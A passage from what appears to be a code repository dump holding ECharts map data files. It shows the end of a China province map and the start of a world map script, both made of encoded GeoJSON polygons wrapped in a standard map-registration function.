x\\\\ZjÒ¨GtpþYŊĕ´zUOëPîMĄÁxH´áiÜUàîÜŐĂÛSuŎrJðÌ¬EFÁú×uÃÎkrĒ{V}İ«O_ÌËĬ©ÓŧSRÑ±§Ģ£^ÂyèçěM³Ƃę{[¸¿uºµ[gt£¸OƤĿéYõ·kĀq]juw¥DĩƍõÇPéÄ½G©ã¤GuȧþRcÕĕNyyût­øï»a½ē¿BMoį£Íj}éZËqbʍƬh¹ìÿÓAçãnIÃ¡I`ks£CG­ěUy×Cy@¶ʡÊBnāzGơMē¼±O÷õJËĚăVĪũƆ£¯{ËL½ÌzżVR|ĠTbuvJvµhĻĖHAëáa­OÇðñęNwœľ·LmI±íĠĩPÉ×®ÿscB³±JKßĊ«`ađ»·QAmOVţéÿ¤¹SQt]]Çx±¯A@ĉĳ¢Óļ©l¶ÅÛrŕspãRk~¦ª]Į­´FRåd­ČsCqđéFn¿ÅƃmÉx{W©ºƝºįkÕƂƑ¸wWūÐ©ÈF£\\\\tÈ¥ÄRÈýÌJ lGr^×äùyÞ³fjc¨£ÂZ|ǓMĝÏ@ëÜőRĝ÷¡{aïȷPu°ËXÙ{©TmĠ}Y³­ÞIňµç½©C¡į÷¯B»|St»]vųs»}MÓ ÿʪƟǭA¡fs»PY¼c¡»¦cċ­¥£~msĉPSi^o©AecPeǵkgyUi¿h}aHĉ^|á´¡HØûÅ«ĉ®]m¡qĉ¶³ÈyôōLÁstB®wn±ă¥HSòė£Së@×œÊăxÇN©©T±ª£Ĳ¡fb®Þbb_Ą¥xu¥B{łĝ³«`dƐt¤ťiñÍUuºí`£^tƃĲc·ÛLO½sç¥Ts{ă\\\\_»kÏ±q©čiìĉ|ÍI¥ć¥]ª§D{ŝŖÉR_sÿc³ĪōƿÎ§p[ĉc¯bKmR¥{³Ze^wx¹dƽÅ½ôIg §Mĕ ƹĴ¿ǣÜÍ]Ý]snåA{eƭ`ǻŊĿ\\\\ĳŬűYÂÿ¬jĖqßb¸L«¸©@ěĀ©ê¶ìÀEH|´bRľÓ¶rÀQþvl®ÕETzÜdb hw¤{LRdcb¯ÙVgƜßzÃôì®^jUèXÎ|UäÌ»rK\\\\ªN¼pZCüVY¤ɃRi^rPŇTÖ}|br°qňbĚ°ªiƶGQ¾²x¦PmlŜ[Ĥ¡ΞsĦÔÏâ\\\\ªÚŒU\\\\f¢N²§x|¤§xĔsZPòʛ²SÐqF`ªVÞŜĶƨVZÌL`¢dŐIqr\\\\oäõFÎ·¤»Ŷ×h¹]ClÙ\\\\¦ďÌį¬řtTӺƙgQÇÓHţĒ´ÃbEÄlbʔC|CŮkƮ[ʼ¬ň´KŮÈΰÌĪ¶ƶlðļATUvdTGº̼ÔsÊDÔveOg\"]],\"encodeOffsets\":[[[105308,37219]],[[95370,40081]]]}},{\"type\":\"Feature\",\"id\":\"640000\",\"properties\":{\"id\":\"640000\",\"cp\":[106.278179,37.26637],\"name\":\"宁夏\",\"childNum\":2},\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@KëÀęĞ«Oęȿȕı]ŉ¡åįÕÔ«ǴõƪĚQÐZhv K°öqÀÑS[ÃÖHƖčËnL]ûcÙß@ĝ¾}w»»oģF¹»kÌÏ·{zP§B­¢íyÅt@@á]Yv_ssģ¼ißĻL¾ġsKD£¡N_X¸}B~HaiÅf{«x»ge_bsKF¯¡IxmELcÿZ¤­ĢÝsuBLùtYdmVtNmtOPhRw~bd¾qÐ\\\\âÙH\\\\bImlNZ»loqlVmGā§~QCw¤{A\\\\PKNY¯bFkC¥sks_Ã\\\\ă«¢ħkJi¯rrAhĹûç£CUĕĊ_ÔBixÅÙĄnªÑaM~ħpOu¥sîeQ¥¤^dkKwlL~{L~hw^ófćKyE­K­zuÔ¡qQ¤xZÑ¢^ļöÜ¾Ep±âbÊÑÆ^fk¬NC¾YpxbK~¥eÖäBlt¿Đx½I[ĒǙWf»Ĭ}d§dµùEuj¨IÆ¢¥dXªƅx¿]mtÏwßRĶX¢͎vÆzƂZò®ǢÌʆCrâºMÞzÆMÒÊÓŊZÄ¾r°Î®Ȉmª²ĈUªĚîøºĮ¦ÌĘk^FłĬhĚiĀĖ¾iİbjÕ\"],[\"@@mfwěwMrŢªv@G\"]],\"encodeOffsets\":[[[109366,40242]],[[108600,36303]]]}},{\"type\":\"Feature\",\"id\":\"650000\",\"properties\":{\"id\":\"650000\",\"cp\":[85.617733,40.792818],\"name\":\"新疆\",\"childNum\":1},\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@QØĔ²X¨~ǘBºjʐßØvKƔX¨vĊOÃ·¢i@~cĝe_«E}QxgɪëÏÃ@sÅyXoŖ{ô«ŸuXêÎf`C¹ÂÿÐGĮÕĞXŪōŸMźÈƺQèĽôe|¿ƸJR¤ĘEjcUóº¯Ĩ_ŘÁMª÷Ð¥OéÈ¿ÖğǤǷÂFÒzÉx[]­Ĥĝœ¦EP}ûƥé¿İƷTėƫœŕƅƱB»Đ±ēO¦E}`cȺrĦáŖuÒª«ĲπdƺÏØZƴwʄ¤ĖGĐǂZĶèH¶}ÚZצʥĪï|ÇĦMŔ»İĝǈì¥Βba­¯¥ǕǚkĆŵĦɑĺƯxūД̵nơʃĽá½M»òmqóŘĝčË¾ăCćāƿÝɽ©ǱŅ¹đ¥³ðLrÁ®ɱĕģŉǻ̋ȥơŻǛȡVï¹Ň۩ûkɗġƁ§ʇė̕ĩũƽō^ƕUv£ƁQïƵkŏ½ΉÃŭÇ³LŇʻ«ƭ\\\\lŭD{ʓDkaFÃÄa³ŤđÔGRÈƚhSӹŚsİ«ĐË[¥ÚDkº^Øg¼ŵ¸£EÍöůŉT¡c_ËKYƧUśĵÝU_©rETÏʜ±OñtYwē¨{£¨uM³x½şL©Ùá[ÓÐĥ Νtģ¢\\\\śnkOw¥±T»ƷFɯàĩÞáB¹ÆÑUwŕĽw[mG½Èå~Æ÷QyěCFmĭZīŵVÁƿQƛûXS²b½KÏ½ĉS©ŷXĕ{ĕK·¥Ɨcqq©f¿]ßDõU³h­gËÇïģÉɋwk¯í}I·œbmÉřīJɥĻˁ×xoɹīlc¤³Xù]ǅA¿w͉ì¥wÇN·ÂËnƾƍdÇ§đ®ƝvUm©³G\\\\}µĿQyŹlăµEwǇQ½yƋBe¶ŋÀůo¥AÉw@{Gpm¿AĳŽKLh³`ñcËtW±»ÕSëüÿďDu\\\\wwwù³VLŕOMËGh£õP¡erÏd{ġWÁč|yšg^ğyÁzÙs`s|ÉåªÇ}m¢Ń¨`x¥ù^}Ì¥H«YªƅAÐ¹n~ź¯f¤áÀzgÇDIÔ´AňĀÒ¶ûEYospõD[{ù°]uJqU|Soċxţ[õÔĥkŋÞŭZËºóYËüċrw ÞkrťË¿XGÉbřaDü·Ē÷AÃª[ÄäIÂ®BÕĐÞ_¢āĠpÛÄȉĖġDKwbmÄNôfƫVÉviǳHQµâFù­Âœ³¦{YGd¢ĚÜO {Ö¦ÞÍÀP^bƾl[vt×ĈÍEË¨¡Đ~´î¸ùÎhuè`¸HÕŔVºwĠââWò@{ÙNÝ´ə²ȕn{¿¥{l÷eé^eďXj©î\\\\ªÑòÜìc\\\\üqÕ[Č¡xoÂċªbØ­ø|¶ȴZdÆÂońéG\\\\¼C°ÌÆn´nxÊOĨŪƴĸ¢¸òTxÊǪMīĞÖŲÃɎOvʦƢ~FRěò¿ġ~åŊúN¸qĘ[Ĕ¶ÂćnÒPĒÜvúĀÊbÖ{Äî¸~Ŕünp¤ÂH¾ĄYÒ©ÊfºmÔĘcDoĬMŬS¤s²ʘÚžȂVŦ èW°ªB|ĲXŔþÈJĦÆæFĚêYĂªĂ]øªŖNÞüAfɨJ¯ÎrDDĤ`mz\\\\§~D¬{vJÂ«lµĂb¤pŌŰNĄ¨ĊXW|ų ¿¾ɄĦƐMTòP÷fØĶK¢ȝ˔Sô¹òEð­`Ɩ½ǒÂň×äı§ĤƝ§C~¡hlåǺŦŞkâ~}FøàĲaĞfƠ¥Ŕd®U¸źXv¢aƆúŪtŠųƠjdƺƺÅìnrh\\\\ĺ¯äɝĦ]èpĄ¦´LƞĬ´ƤǬ˼Ēɸ¤rºǼ²¨zÌPðŀbþ¹ļD¢¹\\\\ĜÑŚ¶ZƄ³àjĨoâȴLÊȮĐ­ĚăÀêZǚŐ¤qȂ\\\\L¢ŌİfÆs|zºeªÙæ§΢{Ā´ƐÚ¬¨Ĵà²łhʺKÞºÖTiƢ¾ªì°`öøu®Ê¾ãØ\"],\"encodeOffsets\":[[88824,50096]]}},{\"type\":\"Feature\",\"id\":\"110000\",\"properties\":{\"id\":\"110000\",\"cp\":[116.405285,39.904989],\"name\":\"北京\",\"childNum\":1},\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ĽOÁûtŷmiÍt_H»Ĩ±d`¹­{bwYr³S]§§o¹qGtm_SŧoaFLgQN_dV@Zom_ć\\\\ßcÂ±x¯oœRcfe£o§ËgToÛJíĔóu|wP¤XnO¢ÉŦ¯rNÄā¤zâŖÈRpŢZÚ{GrFt¦Òx§ø¹RóäV¤XdżâºWbwŚ¨Ud®bêņ¾jnŎGŃŶnzÚSeîĜZczî¾i]ÍQaúÍÔiþĩȨWĢü|Ėu[qb[swP@ÅğP¿{\\\\¥A¨ÏÑ¨j¯X\\\\¯MKpA³[Hīu}}\"],\"encodeOffsets\":[[120023,41045]]}},{\"type\":\"Feature\",\"id\":\"120000\",\"properties\":{\"id\":\"120000\",\"cp\":[117.190182,39.125596],\"name\":\"天津\",\"childNum\":1},\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ŬgX§Ü«E¶FÌ¬O_ïlÁgz±AXeµÄĵ{¶]gitgIj·¥îakS¨ÐƎk}ĕ{gBqGf{¿aU^fIư³õ{YıëNĿk©ïËZŏR§òoY×Ógcĥs¡bġ«@dekąI[nlPqCnp{ō³°`{PNdƗqSÄĻNNâyj]äÒD ĬH°Æ]~¡HO¾X}ÐxgpgWrDGpù^LrzWxZ^¨´T\\\\|~@IzbĤjeĊªz£®ĔvěLmV¾Ô_ÈNW~zbĬvG²ZmDM~~\"],\"encodeOffsets\":[[120237,41215]]}},{\"type\":\"Feature\",\"id\":\"310000\",\"properties\":{\"id\":\"310000\",\"cp\":[121.472644,31.231706],\"name\":\"上海\",\"childNum\":6},\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ɧư¬EpƸÁxc\"],[\"@@©ª\"],[\"@@MA\"],[\"@@QpİE§ÉC¾\"],[\"@@bŝÕÕEȣÚƥêImɇǦèÜĠÚÃƌÃ͎ó\"],[\"@@ǜûȬɋŭ×^sYɍDŋŽąñCG²«ªč@h_p¯A{oloY¬j@Ĳ`gQÚhr|ǀ^MĲvtbe´R¯Ô¬¨Yô¤r]ìƬį\"]],\"encodeOffsets\":[[[124702,32062]],[[124547,32200]],[[124808,31991]],[[124726,32110]],[[124903,32376]],[[124438,32149]]]}},{\"type\":\"Feature\",\"id\":\"500000\",\"properties\":{\"id\":\"500000\",\"cp\":[107.304962,29.533155],\"name\":\"重庆\",\"childNum\":2},\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@vjG~nGŘŬĶȂƀƾ¹¸ØÎezĆT¸}êÐqHðqĖä¥^CÆIj²p\\\\_ æüY|[YxƊæu°xb®Űb@~¢NQt°¶Sæ Ê~rǉĔëĚ¢~uf`faĔJåĊnÖ]jƎćÊ@£¾a®£Ű{ŶĕFègLk{Y|¡ĜWƔtƬJÑxq±ĢN´òKLÈÃ¼D|s`ŋć]Ã`đMûƱ½~Y°ħ`ƏíW½eI½{aOIrÏ¡ĕŇapµÜƅġ^ÖÛbÙŽŏml½SêqDu[RãË»ÿw`»y¸_ĺę}÷`M¯ċfCVµqŉ÷Zgg`d½pDOÎCn^uf²ènh¼WtƏxRGg¦pVFI±G^Ic´ecGĹÞ½sëĬhxW}KÓe­XsbkF¦LØgTkïƵNï¶}Gyw\\\\oñ¡nmĈzj@Óc£»Wă¹Ój_m»¹·~MvÛaq»­ê\\\\ÂoVnÓØÍ²«bq¿efE Ĝ^Q~ Évýş¤²ĮpEİ}zcĺL½¿gÅ¡ýE¡ya£³t\\\\¨\\\\vú»¼§·Ñr_oÒý¥u_n»_At©ÞÅ±ā§IVeëY}{VPÀFA¨ąB}q@|Ou\\\\FmQFÝMwå}]|FmÏCawu_p¯sfÙgYDHl`{QEfNysB¦zG¸rHeN\\\\CvEsÐùÜ_·ÖĉsaQ¯}_UxÃđqNH¬Äd^ÝŰR¬ã°wećJE·vÝ·HgéFXjÉê`|ypxkAwWĐpb¥eOsmzwqChóUQl¥F^lafanòsrEvfQdÁUVfÎvÜ^eftET¬ôA\\\\¢sJnQTjPØxøK|nBzĞ»LYFDxÓvr[ehľvN¢o¾NiÂxGpâ¬zbfZo~hGi]öF||NbtOMn eA±tPTLjpYQ|SHYĀxinzDJÌg¢và¥Pg_ÇzIIII£®S¬ØsÎ¼£N\"],[\"@@ifjN@s\"]],\"encodeOffsets\":[[[109628,30765]],[[111725,31320]]]}},{\"type\":\"Feature\",\"id\":\"810000\",\"properties\":{\"id\":\"810000\",\"cp\":[114.173355,22.320048],\"name\":\"香港\",\"childNum\":5},\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@AlBk\"],[\"@@mn\"],[\"@@EpFo\"],[\"@@ea¢pl¸Eõ¹hj[]ÔCÎ@lj¡uBX´AI¹[yDU]W`çwZkmcMpÅv}IoJlcafŃK°ä¬XJmÐ đhI®æÔtSHnEÒrÈc\"],[\"@@rMUwAS®e\"]],\"encodeOffsets\":[[[117111,23002]],[[117072,22876]],[[117045,22887]],[[116975,23082]],[[116882,22747]]]}},{\"type\":\"Feature\",\"id\":\"820000\",\"properties\":{\"id\":\"820000\",\"cp\":[113.54909,22.198951],\"name\":\"澳门\",\"childNum\":1},\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@kÊd°å§s\"],\"encodeOffsets\":[[116279,22639]]}}],\"UTF8Encoding\":true});\n}));\n"
  },
  {
    "path": "flask/static/js/echarts/map/js/world.js",
    "content": "/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n(function (root, factory) {if (typeof define === 'function' && define.amd) {define(['exports', 'echarts'], factory);} else if (typeof exports === 'object' && typeof exports.nodeName !== 'string') {factory(exports, require('echarts'));} else {factory({}, root.echarts);}}(this, function (exports, echarts) {var log = function (msg) {if (typeof console !== 'undefined') {console && console.error && console.error(msg);}};if (!echarts) {log('ECharts is not Loaded');return;}if (!echarts.registerMap) {log('ECharts Map is not loaded');return;}echarts.registerMap('world', {\"type\":\"FeatureCollection\",\"crs\":{\"type\":\"name\",\"properties\":{\"name\":\"urn:ogc:def:crs:OGC:1.3:CRS84\"}},\"features\":[{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@࠿@ᠳ࡚с̶ʩт˷˔ƹͮɠͲ˖рԜ׷҄̕ҴNܾͰؼ÷۸ήԪҮƴ̮¿ঞɪֶϤϲŹƛе²֭ĝǱƊĠǔōϭñėށ؅ਓɁȥԯ঻ƻԓࣗඩअ৯۝ڻो֑য়ߝล໥ϓ؇UļāļƫȖɩ̌]ᶼ̈́͘ɮ͜ɪ͚®ĞĚ۪ƼɦːϪǰ;Ąߞᢌᣮ\"],\"encodeOffsets\":[[49130,8189]]},\"properties\":{\"name\":\"Somalia\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ƛ¬Ð@ĞÆÒªǱ\"],\"encodeOffsets\":[[9810,48188]]},\"properties\":{\"name\":\"Liechtenstein\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@⌗øĒ୬ͪࣆيʊˆ҄ؔ^˶ȇɪÈצϲ֌ĐФ؜ְദ׼ҢڴήࡔլİtʍԾ΃ʤ՘ĲʢË΢ǒŎɽĠPĀmǶVǢgΤ̑ĮவňȵǑ¼ýĈå²yĞÇÞ³ëąÍĥʹ೵]É³Ɨ{ΡŉƑcăZÉSÍƫH˃ǨǓѭǇƣġǥÕȿÕǃñÿśıƇħěŽđұĿЍUƉÝåSĵ^čfʉdʇǍ·ণ֣oۋ@Ĺ\"],\"encodeOffsets\":[[-8891,28445]]},\"properties\":{\"name\":\"Morocco\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@⌘@ķœ@@@Ŕ@@̷@̩@ǕBȍ@ȋ@ƍ@ĩ᫫@@ɋ@΃@ɭ@ŕ@қ@΃Oх̉űƽw½gΉɩķƯtįQJǳ՟TšRšPėRŏᇷCฝCċα`ý§¨Ƙ࢘Ӕ׎ŰшΞ׎ǇĹèƤ࠴݂Ģָ͌܌۴КͲޞŚƀ\",\"@@i˷@@j˸\"],\"encodeOffsets\":[[-13351,28480],[-8984,28120]]},\"properties\":{\"name\":\"W. Sahara\",\"childNum\":2}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@A@ƟwđĵȏÒʁč«Ǔƅ@ã̌Ο˘SǴʒÊÆ`Å_֡˰ϟʊkIDZʪĠɁ˔˶àϷˈȘѬ˻W²ɤ˲ÚͩǀºĬȋːÈĆѠŎǊĘȘoø`Ȓg¤_cº·¶ÙȈėÒ÷´fFfV\\\\T^Qhɿ՘ɳkĝƱƨ÷YißMµGuODƎĨãɰİÈßĜhŴĬŬ~Ũ±âZ]ãNÇk¹ėǌƽɣȭkěHãƺ˝Ǵč¬­¡İÃƩǝÿďȫẸ̀Qßço}ß]ĕUΥ@Ʌ±@@\"],\"encodeOffsets\":[[22080,43262]]},\"properties\":{\"name\":\"Serbia\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@хǑޟܯőࡡԧ¡á͘з¤̧սշŊƉˏͭąٝ°̺׿ٓɥɓӱз·ʫɫƚν@ӧʟƆƋʇğԻzЛϭĭ޿ॕʳכ]ʛŷѿĘࣻõЍĺٵȀ͋ĠШъȒȢȌȜxèFƆ·ǴăĆˁȡ|ɍZ{ƒZØaŤDĠƲDèĳ̎őͨaŦ̰̚˽êóļ@͒ƂǲȸZíĊ´ubSv\\\\vÀTÎ hňǞjΔö´ƌFgÈèTɶǓЀ«Ȁǫ͊î̲ǆzĺîĢƘ؜Ɣ˒Ř˞ǈ°òńƲъÖŖ¾ŚǶRɄJǮˊרȋ¦HʲpȮńċľsĺ¤ÚR|¼[þJ¬wNwNÌÛļûĢmǌÂpp^ªô¤ʂĸ®T¸SZ^b\\\\~VvL¤QȂƓî§R¦¼¶^ê}ĞlôÒÈŒǐ`ƐǢbÀèHĎ±ĸ^ǠŶˌ̆ѨīÞŗ­ɃaÎJĊtÄB~oűځĈʁŔů࠰˨ȦȨˈŢƠ®ĈRľsª_ÂW\\\\a÷ËvkĄOΘĈ²ʹkÒČÑ¼­§MÕryWJ·oğ}ƽáHiĸã|u^Q\"],\"encodeOffsets\":[[76331,37911]]},\"properties\":{\"name\":\"Afghanistan\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ÂR̮cҮƠ͎Åǖ@ǔ|ɔDªĞƶHǊŖ̈ƄĺTǊ|ʖĞGR_¿ƽA½n½¦ʬGɼEҾi°oČ଩ýٵ͔ӑĠճēśnʕ¬ÓIàþÖÚ~ɈqɘM͚Ĳ̴ŐŢdܓ×މoěG±ðƁIĵY൑@ȗ@@ڟ@ˑ@ˑBౝǶ֡া࡙ࢳǑ೟Ƶҧƀ਩¼ҹͺሹTᅍeғ̴ʟÌՋȭǃNOėFǗģµƇo͆ƖËܼɠˌ҆ლζ֌θɌƴȞǀЊ¢ݐс޴˫ߚ̢̤hˊүஒґۤݴɦƌOՎNዲQĮĘÇƈǕϡÐŻĚƉÆ˕Ԃۻ\"],[\"@@̆Ƅ_øęÞËr___ğıͅ˭DeÌ·ӏɫθƅːОΖ\"]],\"encodeOffsets\":[[[18002,-8293]],[[12802,-4697]]]},\"properties\":{\"name\":\"Angola\",\"childNum\":2}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@Π˗ä̋ÝԍȄ́ɊßQÙÚŷűŻȉ̍ǝ©¡aquwW@yÐğBƧůÙPÑXkAűˬѽ̨ŚAĹɐȨࠐDŮȡæ½ʮ̾ϦŒŷɴÒ\"],\"encodeOffsets\":[[20546,43569]]},\"properties\":{\"name\":\"Albania\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@Ł^ĊĤ³\"],[\"@@ɨ÷ϫƯħƾƊ¡sƜƖ\"]],\"encodeOffsets\":[[[20135,61632]],[[20470,61800]]]},\"properties\":{\"name\":\"Aland\",\"childNum\":2}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@Ɵ½íIir[ò\\\\¢Ö ÈOŢ~y@esQm\"],\"encodeOffsets\":[[1747,43524]]},\"properties\":{\"name\":\"Andorra\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ʙOǘøĂç\"],[\"@@šȆĶãŷ\"],[\"@@ø֟˗ȫÁǸǣïԿƖw´ŷѡĹÂĹ˧څ[˥ççᒣʾ߳४oǪǘÚȱɴѼƸॺí̆ĐȾĚ̌҂ৎࠠŞɦò_m̙ź\"]],\"encodeOffsets\":[[[55223,24758]],[[54613,24841]],[[57650,26267]]]},\"properties\":{\"name\":\"United Arab Emirates\",\"childNum\":3}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ؠQۓƫĵÜǪĢ\"],[\"@@nᇜ͠έǇvµǥˠŸɏ׶УࢸНࢴŧʕȣ࢑įԭņ౳¦\"],[\"@@ȴǛߖȡפϿବӗɒ˳͉ӡȧɇ˽ͫЛoÁıξบɿɮȜǴGƌùÚDæ¶ÌEæ¶Ì rºʒàǞȔɌͦʮbΰƠ¥ʐĒɜũȈԵƛ۩ЧʩхŃɫˇԽ˳ƩǟXࢣ਍ʉƽƯɃƅę¡ě½õĳģă¾ɣÙßdƕqùşȅißlgĝëĿēk©z¿HÃiÉZÇÁEÕáųeû¤ͩɅŷĻҩžѻőēȰ͗آ˯͆˿Ʒ̛fʳɔɧ˜¥ÞщܿਟՍ̍൱ͷઃŻأУƊϋȰŉŁMĒå¯̩ŽÍīʩžБůǻӃǿ֋¥਻ΤɛŧŬਅϘŷƋŴcˎňƗ¢θĖƒƙZ΍Εƻϟ̲ЛŹ³ýתǭѫȁ΋͏Yש͏͍R̅ҧكʗցڛþؖ͟ӁٺóɖɁÛʗΉǁʔ@ľĩൿࡕǿʛş֡γƻ·̒LƷˋÉ͎KƨůԹ˻˃ѹƄƒеίăрýѬ֯ౡ̊࿩fЩϘÊܞƛØգŋ̉Ԩ«֊þŴ˜\\\\Đʊ͐ƢÌ̮ȒĠvɌǃȞƠ͒ψʔ̶ȬưƧЮȴǨī̀ͮȺȹ̒ϏÚmŎڬRĐǠ«Ĵԛ¶ŞϢȋӨżĢͩȺب̜ǤƉͬiߪȊʼğǤƄž»͖ƲŚ֖Ҙˤʷ۾qޚŘˎմϲUҐŝɶƌČ˺܆ǚÜ߆ɝèÀˊ˻ڨĠł˥͚ÆΞǰłƀ֌ǒFĦƶīĆÉيǘȄƞׄМЪˠ٪Ɉ\\\\ɰƖɭцƪˈƫ؞Ǫˠƫ̂ʾ̘ݨ̞̈ࢂƽưǢʾɼʚ̆Ē¼ĘİxzEÜ}ǘşöãîSƖ`Ѷ_͘ĳèţħčÔƧ¢ÇdǊʒѾ°࣠Ǽʗî·ƚ÷ƄƣΔӍ׶Ћ\"]],\"encodeOffsets\":[[[-66098,-56029]],[[-70300,-56170]],[[-62550,-24224]]]},\"properties\":{\"name\":\"Argentina\",\"childNum\":3}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@́{ř̮ǯŔfƖ˟§ʭôķƶɛ½Г˲Իðą̘ŸȦʁ͚՚Ú؞ÞǆǀťıÑѢȓǫƣÜşєʣßǫʳ¡Ժ͏ɼīŷȀƭƹúʇ\"],\"encodeOffsets\":[[47607,39841]]},\"properties\":{\"name\":\"Armenia\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@āɆƃë\"],\"encodeOffsets\":[[-174823,-14695]]},\"properties\":{\"name\":\"American Samoa\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@īƨǜMïƙ\"],[\"@@΂ŜªūȩÃŚÕٸǔȢťƙțȃúͽñȐŵɖ¨ĻƣࠅƦƇƥƫJÌ҈ħĊȜͼŒǗëȃŐy\"],[\"@@ƥÈè þħ\"]],\"encodeOffsets\":[[[70946,-50236]],[[70846,-50288]],[[53079,-47554]]]},\"properties\":{\"name\":\"Fr. S. Antarctic Lands\",\"childNum\":3}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ťowîÐÒĎŏ\"],\"encodeOffsets\":[[-63197,17446]]},\"properties\":{\"name\":\"Antigua and Barb.\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ēǡÎƮŸÔı\"],[\"@@Ȫb࢈ͥ;ðŀùŢƨϸQƖƂɂyĄþȺÙńଡŇȶʏԑlԟƇñĈ§ĐŸþȏêķǁŻȲ­ΧȻºæĳǡ˱˙Ĕщ£ƞǴ¼˫p͕̮ʏאɨɗ¢ŚƹǪą¥FƪЅՊĵΆÔʸ˚ĩ\"],[\"@@£ÝÏÒĴL\"],[\"@@éżBÑ\"],[\"@@ÞƯ͑êʴĆ\"],[\"@@ʠȓbƿǩõ˵͢ȞĨ\"],[\"@@÷ǲƌ˖Š̻ǳƋ\"],[\"@@Çȏ|ƾ\"],[\"@@˪ZǎŁϟȅƩȩüϡ¥ǷŤĈŢגƀɀyXı\"],[\"@@ĥɩRʨĔ}\"],[\"@@ǿɪcɂȤѫ\"],[\"@@čǘ¾̞ǂǀéǆĨðþ˫ɭֿ\"],[\"@@þCȷǡȸĨ\"],[\"@@ŅÁĮƶXĳ\"],[\"@@ĕPŊÀř\"],[\"@@jɇǗȞƮj\"],[\"@@ľàēģi\"],[\"@@̉ƙŒɲʚÔĢĵǃµ\"],[\"@@ųÈÈĮìƵ\"],[\"@@ÕgIżàœ\"],[\"@@ěWÌŖĽ\"],[\"@@ƪdũʉǤģ³ğҷèö̆Țǂ¸Ņ\"],[\"@@īPþŸnƇ\"],[\"@@ƃ×ʤǮşŕ\"],[\"@@Ŭřҿ|żňƴŢŠƒ˽\"],[\"@@ͼȶŨɪȹӳЩρʸŅΨȠƹ\"],[\"@@Ñ»ɆΪƳ̭\"],[\"@@ğɠĂÌ^˫\"],[\"@@Í̉ʖ˱ƺڭʟǪԝǤĩјȚƦɕ՞ϙŜ௳ˠЉƂǶ؇ÿՙʪɽ¦ΣٌΓɼ^˘͡ࡢѧŀǇŻZĥѪқȾϟɀܥĴ¨ŶƇȰŔŦϸͧxƦĔƞ࢑ʼ˙֬˵ʤЋ˜ǣǔͱɔȗÒ͑ưů¡ਗϬ࢝εӯཝñܹ͓ԡõͥ˫ȩzá̏ťѩ֯W̃ſáĜq̡ЁÉћԟۏɗාϝȯകƍࡧؕ՝ÁĴƕŊ®ÇʱȭɾȉŧȢͥŌŪŢÇŴƷL˩əȯƈǎGǪɆȓǈеȥɨÕृԡࣩκؗĬŋįƛr΍ʌԷưԗնÔӪŅʔٓڔǬ¶ĤóMȢٕɡ˳|˞ӶkɖͳԀͭࠉڷąŌ˘̈́DĒلςӨã͈ŠĚǫѠNȳ̷̉ǡλڵͳҏՋàˑƩĴŧÝѳ̖ĀĊȞÿȗԸˣ˪ĉʢƵŜʳtŅƼÕȘńdNƶӋ˺ϟpϣȒҗ§࣏ј̣ĝഁ±༱ԕ୷ঃӭџŏإݵଗÙ÷İտ¢ಧů͹ͥұģٓэҭģࣃĢѽǊΟ̴ұƞ_ج̬Ŀ˘ϔ`఼Է॔ȃ஖ׇࣀř؞۽঒Ś½ƎȎБŸĒĂbƘϩԴ´ĪɘșVʣŊĬŚʵĊÓŀĖAπڟஔÔӈɤϜшĥɶ˸َĎ¬fջȢŢ˨Ѥغ˨Ұϰא̈́טÉښ̄ҪĨ̒ɢМஊκ˸ʆи۾ј̬ǕӀĪΎϬ̊ɀ̎Ӿ࣫~ЬȨ÷Ǟ͑άŔØeǊĺŊǃƼİɌĻІ]̯ĔXƔƈhÔȲŧďĻǶ¸ɞĺEŌȈ̶ƗTŔƍEÏŲǘƀˊīƫ;ͶȚ¢ȐÞȧƄ¼ÐůŌļѤŊsØƉŨŨƖšǰǤIƖńҰʍ؈֯ġԱðĖĊÕáɊʹɦМğƂɵ¬ʐ̮ɥFʐǲnȳƴþøˍƒ˦Όň΂ΠɪĿƂǀȚɨǾJǺȶŃLǆΘʦŬǫՂGǄĂƂğČƈǞXçö͖ǗƂͷbȿƢŜĸǎŉƬô̌ʁɺĈȊʡ؀ŁќȅˀÌʦǫǂwעͪǽ͑ʮdÖȗƮWÌňáŎǌȆɶɱƬc¨ęΉι¶ǿŏȅƕò̯ƓxՋҥە¤ƑلЗðƓ